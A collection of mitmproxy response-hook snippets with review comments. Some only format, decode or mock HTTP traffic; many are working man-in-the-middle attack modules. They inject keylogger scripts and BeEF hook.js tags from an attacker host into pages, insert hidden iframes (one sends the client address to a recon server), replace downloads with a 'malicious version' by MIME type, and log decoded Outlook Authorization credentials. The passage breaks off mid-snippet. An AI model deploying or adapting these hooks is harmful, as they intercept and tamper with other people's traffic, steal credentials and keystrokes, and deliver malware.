Example #1
def copy_flow_format_data(part, scope, flow):
    """Build the text for a "copy flow" action.

    ``part`` selects what is copied: ``"u"`` the request URL, ``"h"`` the
    assembled HTTP/1 message, ``"c"`` the body only.  ``scope`` selects the
    side: ``"q"`` request, ``"s"`` response, ``"a"`` both (separated by a
    blank line when the request has content and a response exists).

    Returns ``(data, False)`` on success, or ``(None, message)`` when the
    selected side has no content.  Raises ``ValueError`` for an unknown
    ``part`` once a message is actually being rendered.

    NOTE(review): the text is taken verbatim from the flow, so it presumably
    carries whatever cookies, tokens or credentials the message held; treat
    the copied data as sensitive.
    """
    # The URL needs no decoding and ignores the scope entirely.
    if part == "u":
        return flow.request.url, False

    text = ""

    if scope in ("q", "a"):
        if flow.request.content is None:
            return None, "Request content is missing"
        # Content is read inside decoded() so any content-encoding is undone.
        with models.decoded(flow.request):
            if part == "h":
                text += netlib.http.http1.assemble_request(flow.request)
            elif part == "c":
                text += flow.request.content
            else:
                raise ValueError("Unknown part: {}".format(part))

    both_sides = scope == "a"
    if both_sides and flow.request.content and flow.response:
        # Blank line between the request and the response that follows.
        text += "\r\n\r\n"

    if scope in ("s", "a") and flow.response:
        if flow.response.content is None:
            return None, "Response content is missing"
        with models.decoded(flow.response):
            if part == "h":
                text += netlib.http.http1.assemble_response(flow.response)
            elif part == "c":
                text += flow.response.content
            else:
                raise ValueError("Unknown part: {}".format(part))

    return text, False
Example #2
def copy_flow_format_data(part, scope, flow):
    """Return ``(data, error)`` for copying part of a flow.

    part:  "u" = request URL, "h" = assembled HTTP/1 message, "c" = body.
    scope: "q" = request, "s" = response, "a" = request then response.

    ``error`` is ``False`` on success; when the chosen side has no content
    the result is ``(None, "<reason>")``.  An unrecognised ``part`` raises
    ``ValueError`` at the point where a message would be rendered.

    NOTE(review): output is the raw message text; it presumably includes
    session cookies and authorization headers when "h" is requested.
    """
    if part != "u":
        buf = ""

        request_wanted = scope == "q" or scope == "a"
        if request_wanted:
            if flow.request.content is None:
                return None, "Request content is missing"
            with models.decoded(flow.request):
                if part not in ("h", "c"):
                    raise ValueError("Unknown part: {}".format(part))
                if part == "h":
                    buf += netlib.http.http1.assemble_request(flow.request)
                else:
                    buf += flow.request.content

        if scope == "a" and flow.request.content and flow.response:
            # Two CRLFs separate the request from the response.
            buf += "\r\n" + "\r\n"

        response_wanted = scope == "s" or scope == "a"
        if response_wanted and flow.response:
            if flow.response.content is None:
                return None, "Response content is missing"
            with models.decoded(flow.response):
                if part not in ("h", "c"):
                    raise ValueError("Unknown part: {}".format(part))
                if part == "h":
                    buf += netlib.http.http1.assemble_response(flow.response)
                else:
                    buf += flow.response.content

        return buf, False

    # "u": the URL is returned as-is, whatever the scope.
    return flow.request.url, False
Example #3
 def response(self, flow):
     """Response hook: place ``self.content`` in an inline script before ``</body>``.

     Applied to every response: there is no Content-Type or size check and
     only the literal, case-sensitive ``</body>`` is matched.  The log line
     labels the inserted script a keylogger and is written whether or not a
     replacement actually happened.
     """
     # The rewrite needs the body in cleartext at the proxy; pages delivered
     # over certificate-validated HTTPS (with HSTS preventing a downgrade) do
     # not reach this code in readable form.
     with decoded(flow.response):
         flow.response.content = flow.response.content.replace(
             "</body>", "<script>" + self.content + "</script></body>")
         self.log.info(
             '[{}] *********** keylogger injected *****************'.format(
                 self.name))
 def response(self, flow):
     """Response hook: insert ``self.content`` as an inline script before ``</body>``.

     Does nothing unless ``self.isfilePath`` is truthy.  No Content-Type
     check is made, so non-HTML bodies are passed through ``replace()`` too.
     """
     if self.isfilePath:
         # Body is only readable here for traffic the proxy sees in cleartext.
         with decoded(flow.response):
             flow.response.content = flow.response.content.replace(
                 "</body>", "<script>" + self.content + "</script></body>")
             # Emitted unconditionally: the message is not evidence that the
             # page contained "</body>" and was changed.
             self.send_output.emit(
                 '[{}] javascript keylogger injected..'.format(self.Name))
Example #5
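def response(context, flow):
  """Decode an RPC response envelope and print each returned message.

  Only flows matching the mitmproxy filter ``~u plfe`` are handled.  The
  envelope is parsed from the response body; the method keys recorded for
  the matching request are popped from ``context.methods_for_request`` and
  paired, in order, with ``env.returns``.  Methods not listed in a non-empty
  ``context.filter_methods`` are skipped.

  The body comes from the network and is parsed as-is: a malformed envelope
  is reported and the flow is left alone.
  """
  if not flow.match("~u plfe"):
    return
  with decoded(flow.response):
    try:
      env = RpcResponseEnvelopeProto()
      env.ParseFromString(flow.response.content)
    except Exception as e:
      print("Deserializating Envelop exception: %s" % e)
      return

    # NOTE(review): pop() raises KeyError when no request was recorded for
    # this response_id - confirm that cannot happen for replayed traffic.
    keys = context.methods_for_request.pop(env.response_id)
    for value in env.returns:
      key = keys.popleft()
      name = Method.Name(key)
      if len(context.filter_methods) > 0 and name not in context.filter_methods:
        continue

      # Map the method name to its message class name where the two differ.
      name = mismatched_apis.get(name, name)
      klass = underscore_to_camelcase(name) + "OutProto"

      try:
        mor = deserialize(value, "." + klass)
        print("Deserialized Response %i: %s" % (env.response_id, name))
      except Exception:
        # Without this ``continue`` the code below would use an unbound
        # ``mor`` (first iteration) or the previous iteration's message.
        print("Missing Response API: %s" % name)
        continue

      print(mor)
      if key == GET_MAP_OBJECTS:
        getMapObjects.response(mor, env)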
Example #6
def response(context, flow):
    """Serve a local file instead of the upstream body for mapped URLs.

    The request URL is reduced to scheme, netloc and path (query string and
    fragment are dropped) and looked up in ``context.data``.  On a hit the
    mapped file is read in text mode and becomes the response content; on a
    miss the response is left untouched.
    """
    parsed = urlparse(flow.request.pretty_url)
    lookup_key = "".join((parsed.scheme, "://", parsed.netloc, parsed.path))
    if lookup_key not in context.data:
        return
    with decoded(flow.response):
        with open(context.data[lookup_key], "r") as replacement:
            flow.response.content = replacement.read()
Example #7
def response(context, flow):
    """Apply the rule attached to ``flow`` to its response.

    In order: optional delay, status override, schema validation of the
    upstream body (results stored and logged), header processing, and body
    replacement from a rule-supplied file.  Nothing happens when
    ``driver.name`` is unset or the flow carries no rule.
    """
    if not driver.name:
        return

    rule = flow.mastermind["rule"]
    if not rule:
        return

    pause = rules.delay(rule)
    if pause:
        time.sleep(pause)

    with decoded(flow.response):
        forced_status = rules.status_code(rule)
        body_file = rules.body_filename(rule)
        expected_schema = rules.schema(rule, context.source_dir)

        if forced_status:
            # Resolve the reason phrase first, then update both fields.
            reason = http.status_message(forced_status)
            flow.response.status_code = forced_status
            flow.response.msg = reason

        if expected_schema:
            results_table = driver.db.table(flow.request.url)
            # safe_load: the upstream body is untrusted, so only plain YAML
            # types are constructed from it.
            parsed_body = yaml.safe_load(flow.response.content)
            findings = validator.check(parsed_body, expected_schema)
            results_table.insert_multiple(findings)
            logger.info(findings)

        rules.process_headers("response", rule, flow.response.headers)

        if body_file:
            # The request hook's skip rule may have set 204; a replaced body
            # needs a status that can carry content.
            if flow.response.status_code == 204:
                flow.response.status_code = 200
                flow.response.msg = "OK"
            flow.response.content = rules.body(body_file, context.source_dir)
Example #8
def response(context, flow):
    """Hand matching trade request/response pairs to a worker thread.

    mitmproxy calls this hook "when a server response has been received".
    Only responses are hooked because the interest is in request/response
    pairs: the captured response and its request together make up one
    transaction, represented by mitmproxy.models.HTTPFlow() ("HTTPFlow is
    collection of objects representing a single HTTP transaction").
    More information: http://docs.mitmproxy.org/en/stable/dev/models.html
    """
    # The leading dot means only subdomains of thesettlersonline.pl match.
    if flow.request.host.endswith('.thesettlersonline.pl'):
        # "_" is the fallback when the response has no Content-Type header.
        if "application/x-amf" in flow.response.headers.get("Content-Type", "_"):
            with decoded(flow.response):
                res = flow.response.content
                req = flow.request.content
                # All three markers must occur in the response and the call
                # name in the request before the pair is passed on.
                if  search( 'defaultGame.Communication.VO.TradeWindow.dTradeWindowResultVO', res )\
                and search( 'userAcceptedTradeIDs', res ) and search( 'tradeOffers', res )\
                and search( 'GetAvailableOffers', req ):
                    log.debug("got trade REQ/RESP pair, feeding TDD thread...")
                    try:
                        # One daemon thread per matching flow.
                        t= Thread(target=ttd._incoming_traffic_handler, args=(context, flow,))
                        t.setDaemon(True) 
                        t.start()
                    except (KeyboardInterrupt, SystemExit):
                        log.info('caught either KeyboardInterrupt or SystemExit, quitting threads')
                        # NOTE(review): ``t`` is unbound here if the interrupt
                        # arrived before Thread() returned - confirm.
                        t.__stop()
                        import thread
                        thread.interrupt_main()
Example #9
def response(context, flow):
  """Demonstration hook: rewrite selected responses and log one request header.

  Branches, first match wins: openweathermap API JSON is altered and
  re-serialised; JPEG and PNG responses go to ``_blur_that``; for the
  Outlook ActiveSync path the request's Authorization value is decoded and
  logged.  ``flow.reply()`` is called in every case.
  """

  with decoded(flow.response):

    if flow.request.pretty_host == 'api.openweathermap.org':
      # Assumes the body is JSON with the keys indexed below; a different
      # shape presumably raises here - TODO confirm.
      obj = json.loads(flow.response.content)

      if flow.request.path.startswith("/data/2.5/weather"):
        obj["weather"][0]['id'] = '901'
        obj["weather"][0]['icon'] = '11d'
        obj["main"]["temp"] = -273.15
        obj["main"]["description"] = "On est foutus"

        obj["name"] = "\\_o<"
      elif flow.request.path.startswith("/data/2.5/forecast"):
        for e in obj['list']:
          e['clouds'] = 100
          e['temp'] = {"min": -20, "max": -10, "eve": -10, "morn": -20, "night": -15, "day": -10}
          e['weather'][0]['id'] = "901"
          e['weather'][0]['icon'] = "11d"

      flow.response.content = json.dumps(obj)

    # Exact match on the header value: "image/jpeg; ..." with parameters
    # would not take these branches.
    elif 'Content-Type' in flow.response.headers and flow.response.headers['Content-Type'] == 'image/jpeg':
      _blur_that(flow,"JPEG")
    elif 'Content-Type' in flow.response.headers and flow.response.headers['Content-Type'] == 'image/png':
      _blur_that(flow,"PNG")

    elif (flow.request.pretty_host == 'eas.outlook.com'
      and flow.request.path.startswith("/Microsoft-Server-ActiveSync")):
      # Expects "<scheme> <token>"; the token is base64-decoded without
      # checking the scheme.  Base64 is an encoding, not protection: the
      # header is only as private as the (validated) TLS session carrying it.
      atype,b64 = flow.request.headers['Authorization'].split(' ')

      context.log( "OUTLOOK AUTH : %s"%base64.b64decode(b64) , level='info')

  flow.reply()
 def response(self, flow):
     """Response hook built around a CSS rule that rotates ``body`` by 180 degrees.

     The style block is spliced in before the literal ``</body>`` of any
     non-empty response; no Content-Type check is made.
     """
     with decoded(flow.response):
         if flow.response.content:
             # ``c`` receives the rewritten text; nothing in this method
             # assigns it back to flow.response.content.
             c = flow.response.content.replace('</body>', '<style>body '
             '{transform:rotate(180deg);-ms-transform:rotate(180deg);-webkit-transform:rotate(180deg);}'
             '</style></body>')
             # NOTE(review): compares a string with an int, so this does not
             # test whether a replacement happened - confirm intent.
             if c > 0:
                 self.send_output.emit('[{}] {} CSS injected...'.format(self.Name,flow.request.pretty_host))
Example #11
    def response(self, flow):
        """Response hook: insert a script template inline before ``self.replace_str``.

        The template is re-read from ``self.content_path`` for every
        response and its ``SECONDS_GO_HERE`` placeholder is replaced with
        ``self.interval * 1000``.  No Content-Type check is made.
        """
        # Only bodies the proxy can read in cleartext can be rewritten here.
        with decoded(flow.response):

            # NOTE(review): the file object is never closed explicitly.
            canvas = re.sub("SECONDS_GO_HERE", str(self.interval * 1000),
                            open(self.content_path, "rb").read())
            flow.response.content = flow.response.content.replace(
                self.replace_str, '<script type="text/javascript">' + canvas +
                '</script>' + self.replace_str)
Example #12
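def response(context, flow):
    """Forward decoded response bodies from nianticlabs.com hosts to a local API.

    The body is POSTed to ``/api/update`` on 127.0.0.1 (default HTTP port).
    A reply outside the 2xx/3xx classes is logged at error level.
    """
    host = flow.request.host
    # Match the domain itself or a real subdomain.  A bare
    # endswith("nianticlabs.com") also accepts unrelated hosts such as
    # "notnianticlabs.com", whose bodies would then be forwarded too.
    if host != "nianticlabs.com" and not host.endswith(".nianticlabs.com"):
        return

    with decoded(flow.response):
        conn = HTTPConnection("127.0.0.1")
        try:
            conn.request("POST", "/api/update", flow.response.content)
            res = conn.getresponse()
            # Floor division keeps the status class an int on Python 3 too
            # (204 / 100 would be 2.04 and be reported as an error).
            if res.status // 100 not in [2, 3]:
                context.log("Got error sending mitm data to api ({})".format(res.status), level="error")
        finally:
            # One connection per response: close it so sockets do not pile up.
            conn.close()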
Example #13
 def response(self, flow):
     """Response hook built around a CSS rule that rotates ``body`` by 180 degrees.

     Acts on any non-empty response; the style block is spliced in before
     the literal, case-sensitive ``</body>``.
     """
     with decoded(flow.response):
         if flow.response.content:
             # The rewritten text is kept in ``c`` only; this method does not
             # write it back to flow.response.content.
             c = flow.response.content.replace(
                 '</body>', '<style>body '
                 '{transform:rotate(180deg);-ms-transform:rotate(180deg);-webkit-transform:rotate(180deg);}'
                 '</style></body>')
             # NOTE(review): string-vs-int comparison; it does not show
             # whether "</body>" was present - confirm intent.
             if c > 0:
                 self.send_output.emit('[{}] {} CSS injected...'.format(
                     self.Name, flow.request.pretty_host))
Example #14
    def response(self, flow):
        """Response hook: wrap the file at ``self.content_path`` in an inline script.

        The file is read again for every response and inserted before the
        literal ``</body>``.  There is no Content-Type check, so every body
        the proxy can read in cleartext is passed through ``replace()``.
        """
        with decoded(flow.response):

            # Accumulate the file line by line into one string.
            inject_content = ""
            with open(self.content_path, 'r') as f:
                for line in f:
                    inject_content += line

            # replace() is a no-op for bodies without "</body>".
            flow.response.content = flow.response.content.replace(
                "</body>", "<script>" + inject_content + "</script></body>")
 def response(self,flow):
     """Response hook: swap the body of image responses for a local file.

     Applies when the Content-Type value starts with ``image`` and
     ``self.imagePath`` exists.  The Content-Type header is left as received,
     so the declared type may not match the substituted bytes.
     """
     # NOTE(review): the header lookup sits outside the try block; a response
     # without Content-Type presumably raises here - confirm.
     if str(flow.response.headers['Content-Type']).startswith('image'):
         if path.isfile(self.imagePath):
             with decoded(flow.response):
                 try:
                     img = cStringIO.StringIO(open(self.imagePath, 'rb').read())
                     flow.response.content = img.getvalue()
                     self.send_output.emit('[{}] URL:{} image replaced...'.format(self.Name,flow.request.url))
                 except:
                     # Any failure is swallowed and the original body is kept.
                     pass
Example #16
 def response(self, flow):
     """Response hook: insert the file at ``self.content_path`` as an inline script.

     Runs for every response without a Content-Type check; only the
     literal, case-sensitive ``</body>`` is matched.
     """
     # Requires the body in cleartext at the proxy; validated HTTPS keeps
     # page content out of reach of this rewrite.
     with decoded(flow.response):
         
         inject_content = ""
         with open(self.content_path, 'r') as f:
             for line in f:
                 inject_content += line
         
         flow.response.content = flow.response.content.replace("</body>", "<script>" + inject_content + "</script></body>")
         
Example #17
 def response(self, flow):
     """Response hook: add a ``<script src=...>`` tag as the first child of ``<body>``.

     The source URL comes from ``self.config["beef_url"]``.  Every response
     is parsed as HTML (no Content-Type check) and, when a body element is
     found, the whole document is re-serialised.
     """
     with decoded(flow.response):  # Remove content encoding (gzip, ...)
         html = BeautifulSoup(flow.response.content)
         if html.body:
             # An external script source is subject to the page's
             # Content-Security-Policy if that header reaches the browser
             # intact; this hook leaves response headers unchanged.
             script = html.new_tag('script', src=self.config["beef_url"])
             html.body.insert(0, script)
             flow.response.content = str(html)
             ctx.log.info(
                 "[{}] Injected BeFF url hook in page '{}'...".format(
                     self.name, flow.request.url))
Example #18
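def response(context, flow):
  """Decode RPC responses from pgorelease.nianticlabs.com and report their payloads.

  The envelope's ``response_id`` is looked up in ``associate`` to find the
  method key, and only the first entry of ``env.returns`` is decoded.
  GET_MAP_OBJECTS replies are flattened into a GeoJSON FeatureCollection
  written to ``get_map_objects.json`` in the working directory; FORT_DETAILS
  and FORT_SEARCH replies are printed; any other key is printed by name.
  """
  # (tile attribute, "type" property, marker colour, attribute supplying the
  # "id" property - None where no "id" property is emitted)
  layers = (
    ("forts", "fort", "0000FF", "id"),
    ("location4", "location4", "FFFF00", None),
    ("location9", "location9", "00FFFF", None),
    ("close_pokemon_a", "close_pokemon_a", "FF0000", "uid"),
    ("close_pokemon_b", "close_pokemon_b", "00FF00", "uid"),
  )

  with decoded(flow.response):
    if flow.match("~d pgorelease.nianticlabs.com"):
      env = RpcResponseEnvelopeProto()
      env.ParseFromString(flow.response.content)
      key = associate[env.response_id]
      value = env.returns[0]

      if key == GET_MAP_OBJECTS:
        mor = MapObjectsResponse()
        mor.ParseFromString(value)
        print("GET_MAP_OBJECTS %i tiles" % len(mor.tiles))
        features = []

        for tile in mor.tiles:
          print("S2 Cell %i" % tile.id)
          for attr, kind, colour, id_attr in layers:
            for entry in getattr(tile, attr):
              props = {"tile": tile.id, "type": kind, "marker-color": colour}
              if id_attr is not None:
                props["id"] = getattr(entry, id_attr)
              point = Point((entry.longitude, entry.latitude))
              # Feature ids are the running index across all layers and tiles.
              features.append(Feature(geometry=point, id=len(features), properties=props))

        dump = geojson.dumps(FeatureCollection(features), sort_keys=True)
        # The context manager flushes and closes the file; previously the
        # handle was left open and the write could stay buffered.
        with open('get_map_objects.json', 'w') as out:
          out.write(dump)
      elif key == FORT_DETAILS:
        mor = FortDetailsOutProto()
        mor.ParseFromString(value)
        print(mor)
      elif key == FORT_SEARCH:
        mor = FortSearchOutProto()
        mor.ParseFromString(value)
        print(mor)
      else:
        print("API: %s" % key)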
Example #19
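def response(context, flow):
    """POST decoded nianticlabs.com response bodies to ``/api/update`` on 127.0.0.1.

    Any reply whose status is not in the 2xx or 3xx class is reported through
    ``context.log`` at error level.
    """
    host = flow.request.host
    # Require an exact match or a dot-delimited subdomain: a plain suffix
    # test would also select hosts like "notnianticlabs.com".
    is_target = host == "nianticlabs.com" or host.endswith(".nianticlabs.com")
    if not is_target:
        return

    with decoded(flow.response):
        conn = HTTPConnection("127.0.0.1")
        try:
            conn.request("POST", "/api/update", flow.response.content)
            res = conn.getresponse()
            # ``//`` so the status class stays an integer under Python 3.
            if res.status // 100 not in [2, 3]:
                context.log("Got error sending mitm data to api ({})".format(
                    res.status),
                            level="error")
        finally:
            # Release the per-response connection.
            conn.close()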
Example #20
def response(context, flow):
    """Response hook: add a remote ``hook.js`` script tag before ``</body>`` in HTML.

    Only responses whose Content-Type contains ``text/html`` and whose body
    contains the literal ``</body>`` are changed.
    """
    replace_str = "</body>"
    # The tag points at plain HTTP, port 3000, on context.hook_ip.  Client
    # requests for /hook.js on that port are therefore visible in proxy or
    # egress logs, and a browser would normally treat the tag as mixed
    # content on an HTTPS page.
    replace_content = "<script src='http://"+context.hook_ip+":3000/hook.js'></script>"
    
    # NOTE(review): direct indexing; a response without Content-Type
    # presumably raises KeyError here - confirm.
    if "text/html" in flow.response.headers['Content-Type']:
        with decoded(flow.response):
            if replace_str in flow.response.content:
                flow.response.content = flow.response.content.replace(replace_str, replace_content + replace_str)
                context.log("hook.js injected!")
    else:
        pass
Example #21
def response(context, flow):
    """Rotate image responses by 180 degrees and return them as PNG.

    Responses whose content-type does not start with ``image`` are left
    alone.  Images that cannot be opened or saved are passed through
    unchanged.
    """
    content_type = flow.response.headers.get("content-type", "")
    if not content_type.startswith("image"):
        return

    # decoded() undoes any content-encoding while the body is rewritten.
    with decoded(flow.response):
        try:
            source = cStringIO.StringIO(flow.response.content)
            flipped = Image.open(source).rotate(180)
            sink = cStringIO.StringIO()
            flipped.save(sink, "png")
            flow.response.content = sink.getvalue()
            # The body is now PNG whatever the original format was.
            flow.response.headers["content-type"] = "image/png"
        except:  # unsupported or corrupt image data
            pass
Example #22
def response(context, flow):
    """Turn every image response upside down, re-encoding it as PNG.

    Non-image responses (by content-type prefix) are skipped; images that
    fail to decode or encode keep their original body and header.
    """
    is_image = flow.response.headers.get("content-type", "").startswith("image")
    if is_image:
        # Work on the content with content-encoding removed.
        with decoded(flow.response):
            try:
                original = StringIO(flow.response.content)
                rotated = Image.open(original).rotate(180)
                encoded = StringIO()
                rotated.save(encoded, "png")
                flow.response.content = encoded.getvalue()
                flow.response.headers["content-type"] = "image/png"
            except:  # image type not handled by the imaging library, etc.
                pass
Example #23
def response(context, flow):
    """Response hook: insert a remote ``hook.js`` script tag ahead of ``</body>``.

    Limited to responses whose Content-Type contains ``text/html``; bodies
    without the literal ``</body>`` are not changed and nothing is logged.
    """
    replace_str = "</body>"
    # Script source is http://<context.hook_ip>:3000/hook.js - an
    # unencrypted fetch to a fixed port and path that network monitoring
    # can match on.
    replace_content = "<script src='http://" + context.hook_ip + ":3000/hook.js'></script>"

    # Header is indexed directly, with no default for a missing Content-Type.
    if "text/html" in flow.response.headers['Content-Type']:
        with decoded(flow.response):
            if replace_str in flow.response.content:
                flow.response.content = flow.response.content.replace(
                    replace_str, replace_content + replace_str)
                context.log("hook.js injected!")
    else:
        pass
Example #24
 def response(self, flow):
     """Response hook built around an inline script that toggles the body's top margin.

     The script text is spliced in before the literal ``</body>`` of any
     non-empty response; no Content-Type check is made.
     """
     with decoded(flow.response):
         if flow.response.content:
             # The result of replace() is stored in ``c`` and is not assigned
             # back to flow.response.content anywhere in this method.
             c = flow.response.content.replace('</body>', '''<script>
             window.onload=function() {
                 var move=document.getElementsByTagName("body")[0];
                 setInterval(function() {
                     move.style.marginTop=(move.style.marginTop=="4px")?"-4px":"4px";
                 }, 5);
             }
             </script></body>''')
             # NOTE(review): string compared with an int; not a test for
             # "replacement happened" - confirm intent.
             if c > 0:
                 self.send_output.emit('[{}] {} javascript injected...'.format(self.Name,flow.request.pretty_host))
Example #25
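def response(context, flow):
    """Replace the response for ``context.url`` with the file at ``context.filepath``.

    Only an exact URL match is handled.  Caching is disabled on both sides
    (``Cache-Control: no-cache`` set, ``If-None-Match`` and ``ETag``
    removed) so the client does not keep or revalidate an earlier copy.
    """
    if flow.request.url != context.url:
        return

    flow.request.headers['Cache-Control'] = 'no-cache'
    flow.response.headers['Cache-Control'] = 'no-cache'

    if 'If-None-Match' in flow.request.headers:
        del flow.request.headers['If-None-Match']
    if 'ETag' in flow.response.headers:
        del flow.response.headers['ETag']

    with decoded(flow.response):
        # Context manager closes the file; the hook runs once per matching
        # response, so an unclosed handle would accumulate.
        with open(context.filepath) as source:
            flow.response.content = source.read()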
 def response(self, flow):
     """Response hook: substitute a local file for the body of image responses.

     Triggered by a Content-Type value starting with ``image`` when
     ``self.imagePath`` is an existing file.  Headers are not adjusted.
     """
     # Header lookup is outside the try block below.
     if str(flow.response.headers['Content-Type']).startswith('image'):
         if path.isfile(self.imagePath):
             with decoded(flow.response):
                 try:
                     # The file is re-read for every image response.
                     img = cStringIO.StringIO(
                         open(self.imagePath, 'rb').read())
                     flow.response.content = img.getvalue()
                     self.send_output.emit(
                         '[{}] URL:{} image replaced...'.format(
                             self.Name, flow.request.url))
                 except:
                     # Errors are discarded; the upstream image is forwarded.
                     pass
Example #27
File: beef.py Project: reo12345/reo
 def response(self, flow):
     """Response hook: insert ``<script src=self.urlhook>`` at the top of ``<body>``.

     Every response is parsed as HTML; when a body element exists the whole
     document is re-serialised with the extra tag.
     """
     with decoded(flow.response):  # Remove content encoding (gzip, ...)
         html = BeautifulSoup(flow.response.content)
         # The string literal below is disabled code, not a comment: it would
         # delete the Content-Security-Policy response header.  While it stays
         # disabled, a CSP restricting script sources still reaches the browser.
         """
         # To Allow CORS
         if "Content-Security-Policy" in flow.response.headers:
             del flow.response.headers["Content-Security-Policy"]
         """
         if html.body:
             script = html.new_tag('script', src=self.urlhook)
             html.body.insert(0, script)
             flow.response.content = str(html)
             self.send_output.emit("[{}] Injected BeFF url hook...".format(
                 self.Name))
Example #28
def response(flow):
    """Response hook: add a zero-size, borderless iframe at the top of ``<body>``.

    The frame source is the module-level ``iframe_url``.  Responses are
    parsed with the lxml parser and re-serialised as UTF-8 when a body
    element is present.
    """
    # Skip responses for the frame's own host so the frame is not nested
    # inside itself (``in`` is a substring test if iframe_url is a string).
    if flow.request.host in iframe_url:
        return
    with decoded(flow.response):  # Remove content encoding (gzip, ...)
        html = BeautifulSoup(flow.response.content, "lxml")
        if html.body:
            # height=0/width=0/frameborder=0: the frame takes no visible space.
            iframe = html.new_tag(
                "iframe",
                src=iframe_url,
                frameborder=0,
                height=0,
                width=0)
            html.body.insert(0, iframe)
            flow.response.content = str(html).encode("utf8")
Example #29
def response(context, flow):
    """Response hook: add a zero-size iframe for ``context.iframe_url`` to ``<body>``.

    No Content-Type check is made; any response that parses to a document
    with a body element is re-serialised with the frame as first child.
    """
    # Responses from the frame's own host are passed through untouched.
    if flow.request.host in context.iframe_url:
        return
    with decoded(flow.response):  # Remove content encoding (gzip, ...)
        html = BeautifulSoup(flow.response.content, "lxml")
        if html.body:
            # A frame with no size and no border leaves the rendered page
            # looking unchanged; it is visible in the delivered markup.
            iframe = html.new_tag("iframe",
                                  src=context.iframe_url,
                                  frameborder=0,
                                  height=0,
                                  width=0)
            html.body.insert(0, iframe)
            flow.response.content = str(html)
            context.log("Iframe inserted.")
Example #30
 def response(self, flow):
     """Response hook: insert ``<script src=self.url>`` as the first child of ``<body>``.

     Runs on every response; the document is re-serialised only when a body
     element is found.
     """
     with decoded(flow.response):  # Remove content encoding (gzip, ...)
         html = BeautifulSoup(flow.response.content)
         # Disabled code kept as a string literal: it would remove the
         # Content-Security-Policy header from the response.
         """
         # To Allow CORS
         if "Content-Security-Policy" in flow.response.headers:
             del flow.response.headers["Content-Security-Policy"]
         """
         if html.body:
             script = html.new_tag('script', src=self.url)
             html.body.insert(0, script)
             flow.response.content = str(html)
             self.log.info(
                 "[{}]******* script Filter Injected *******".format(
                     self.name))
Example #31
def response(context, flow):
    """Response hook: add a hidden iframe whose URL carries the client connection value.

    The frame points at ``/recon/recon.php`` on ``context.server`` over plain
    HTTP and is inserted before ``</body>`` in every response (no
    Content-Type check).  Any ``client_conn_xxx_xxx_xxx_xxx`` placeholder in
    the body is replaced with the same value.
    """
    with decoded(flow.response):  # automatically decode gzipped responses.

        client_conn = str(flow.client_conn)
        # NOTE(review): built from client_conn, not server_conn, and never
        # used afterwards.
        server_conn = str(flow.client_conn)

        # Second space-separated token, then the part before ":" -
        # presumably the client address; depends on str(client_conn)'s format.
        client_conn = client_conn.split(" ")[1]
        client_conn = client_conn.split(":")[0]

        # 1x1 with display:none, so nothing is rendered; the extra request to
        # context.server is still visible in the page source and on the wire.
        inject_recon = "\n<iframe src='http://" + context.server + "/recon/recon.php?client_conn=" + client_conn + "' height='1' width='1' style='display:none'></iframe>\n"

        flow.response.content = flow.response.content.replace(
            "</body>", inject_recon + "</body>")
        flow.response.content = flow.response.content.replace(
            "client_conn_xxx_xxx_xxx_xxx", client_conn)
def response(context, flow):
    """Response hook: insert a zero-size iframe for ``context.iframe_url`` into ``<body>``.

    Uses BeautifulSoup's default parser.  Responses from the frame's own
    host are skipped; all others are parsed regardless of Content-Type.
    """
    if flow.request.host in context.iframe_url:
        return
    with decoded(flow.response):  # Remove content encoding (gzip, ...)
        html = BeautifulSoup(flow.response.content)
        if html.body:
            iframe = html.new_tag(
                "iframe",
                src=context.iframe_url,
                frameborder=0,
                height=0,
                width=0)
            html.body.insert(0, iframe)
            # The whole document is re-serialised, so the forwarded markup
            # may differ from the origin's beyond the added frame.
            flow.response.content = str(html)
            context.log("Iframe inserted.")
Example #33
 def response(self, flow):
     """Response hook: replace a download's body with a local file chosen by Content-Type.

     ``self.payloads`` maps an exact Content-Type value to a file path.  The
     URL and headers the client sees are not changed, so the swap is only
     detectable by transport integrity (validated HTTPS) or by checking the
     file against a hash or signature obtained over another channel.
     """
     try:
         # for another format file types
         content = flow.response.headers['Content-Type']
         if content in self.payloads:
             if path.isfile(self.payloads[content]):
                 with decoded(flow.response):
                     self.log.info('[downloadspoof]:: URL: {}'.format(flow.request.url))
                     self.log.info("[downloadspoof]:: Replaced file of mimtype {} with malicious version".format(content))
                     flow.response.content = open(self.payloads[content],'rb').read()
                     self.log.info('[downloadspoof]:: Patching complete, forwarding to user...')
                 return
             self.log.info('[downloadspoof]:: {}, Error Path file not found\n'.format(self.payloads[content]))
     except Exception as e:
         # Every error, including a missing Content-Type header, is dropped
         # silently and the upstream response is forwarded.
         pass
 def response(self, flow):
     """Response hook: substitute a local file for downloads of a configured Content-Type.

     The match is on the exact header value found in ``self.payloads``; the
     mapped path must exist.  Only the body changes - URL and headers stay
     as the origin sent them.
     """
     try:
         # for another format file types
         content = flow.response.headers['Content-Type']
         if content in self.payloads:
             if path.isfile(self.payloads[content]):
                 with decoded(flow.response): 
                     self.send_output.emit('[downloadspoof]:: URL: {}'.format(flow.request.url))
                     # Logged before the body is actually replaced.
                     self.send_output.emit("[downloadspoof]:: Replaced file of mimtype {} with malicious version".format(content))
                     flow.response.content = open(self.payloads[content],'rb').read()
                     self.send_output.emit('[downloadspoof]:: Patching complete, forwarding to user...')
                 return 
             self.send_output.emit('[downloadspoof]:: {}, Error Path file not found\n'.format(self.payloads[content]))
     except Exception as e:
         # Failures are swallowed; the original download passes through.
         pass
Example #35
    def response(self, flow):
        """Response hook: apply configured literal search/replace pairs to HTML bodies.

        Each value under ``self.config[self.name]["regex"]`` is split on
        ``"||"`` into a search string and a replacement.  Despite the config
        key name, matching is plain substring matching via ``str.replace``.
        """
        pass

        # if "text/html" in flow.response.headers['Content-Type'][0]: # mitmproxy 0.15 [remove]
        if "text/html" in flow.response.headers["Content-Type"]:
            with decoded(flow.response):
                for item, v in self.config[self.name]["regex"].iteritems():
                    # if v.split("||")[0] in flow.request.host and self.theFlag == False:
                    # NOTE(review): a value without "||" raises IndexError on [1].
                    str_search = v.split("||")[0]
                    str_replace = v.split("||")[1]
                    if str_search in flow.response.content:
                        flow.response.content = flow.response.content.replace(str_search, str_replace)
                        logger.debug(
                            "[" + self.name + "] " + str_search + " to " + str_replace + " in " + flow.request.host
                        )
 def response(self, flow):
     """Response hook: replace a download's body with a file from ``self.backdoors``.

     ``self.backdoors`` maps an exact Content-Type value to a local path.
     Headers and URL are untouched, so only an integrity check on the
     delivered file (or validated HTTPS on the transfer) reveals the change.
     """
     try:
         # for another format file types
         content = flow.response.headers['Content-Type']
         if content in self.backdoors:
             if path.isfile(self.backdoors[content]):
